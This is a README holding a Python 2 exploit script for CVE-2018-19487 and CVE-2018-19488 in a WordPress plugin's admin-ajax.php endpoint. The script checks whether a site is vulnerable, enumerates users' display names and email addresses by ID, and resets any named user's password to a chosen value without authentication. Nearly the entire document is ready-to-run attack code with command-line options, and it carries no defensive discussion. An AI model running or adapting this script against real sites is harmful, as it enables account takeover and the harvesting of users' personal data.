README.md
Rendering markdown...
###### CVE-2018-19487 exploit ######
###### CVE-2018-19488 exploit ######
###### Written by Anthony Maestre ######
import requests, urllib, re, sys, json
def checkenum():
print 'Domaine: ' + sys.argv[2]
check = urllib.urlencode({'cs_uid': 1, 'action': 'cs_employer_ajax_profile'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0"}
res = requests.post(sys.argv[2] + "/wp-admin/admin-ajax.php", data=check, headers=headers, verify=False)
if res.status_code == 200:
print '\nVulnerable to users enumeration !'
else:
print '\nNOT Vulnerable to users enumeration.'
def checkreset():
print 'Domaine: ' + sys.argv[2]
check2 = urllib.urlencode({'new_pass': 'admin', 'confirm_new_pass': 'admin', 'user_login': "", 'action': 'cs_reset_pass'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0"}
data = requests.post(sys.argv[2] + "/wp-admin/admin-ajax.php", data=check2, headers=headers, verify=False)
res = re.findall(r'<i class=\"(.*?)\"',str(data.content))
for i in res:
if i == str('icon-warning4') and data.status_code == 200:
print '\nVulnerable to password reset !'
else:
print '\nNOT vulnerable to password reset.'
def enum():
print 'Domaine: ' + sys.argv[2]
for i in range(5):
enum = urllib.urlencode({'cs_uid': i, 'action': 'cs_employer_ajax_profile'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0"}
data = requests.post(sys.argv[2] + "/wp-admin/admin-ajax.php", data=enum, headers=headers, verify=False)
login = re.findall(r'name="display_name" value=\"(.*?)\"',str(data.content))
mail = re.findall(r'name="user_email" value=\"(.*?)\"',str(data.content))
for user in login:
for address in mail:
print "uid " + str(i) +" : " + user + " " + address
def reset():
print 'Domaine: ' + sys.argv[2]
login = raw_input("User: ")
pw = raw_input('New password: ')
reset = urllib.urlencode({'new_pass': pw, 'confirm_new_pass': pw, 'user_login': login, 'action': 'cs_reset_pass'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0"}
data = requests.post(sys.argv[2] + "/wp-admin/admin-ajax.php", data=reset, headers=headers, verify=False)
res = re.findall(r'<i class=\"(.*?)\"',str(data.content))
for i in res:
if i == str('icon-checkmark6') and data.status_code == 200:
print '\nPassword successfully reset ! =)'
else:
print '\nError ! Cannot reset password.'
if len(sys.argv) < 3 or len(sys.argv) > 3 or sys.argv[1] == "--help":
print '\n--checkenum [http(s)://domain] to test if vulnerable to users enumeration'
print '\n--checkreset [http(s)://domain] to test if vulnerable to password reset'
print '\n--enum [http(s)://domain] to enum users'
print '\n--reset [http(s)://domain] to reset user password\n'
elif sys.argv[1] == "--checkenum":
checkenum()
elif sys.argv[1] == "--checkreset":
checkreset()
elif sys.argv[1] == "--enum":
enum()
elif sys.argv[1] == "--reset":
reset()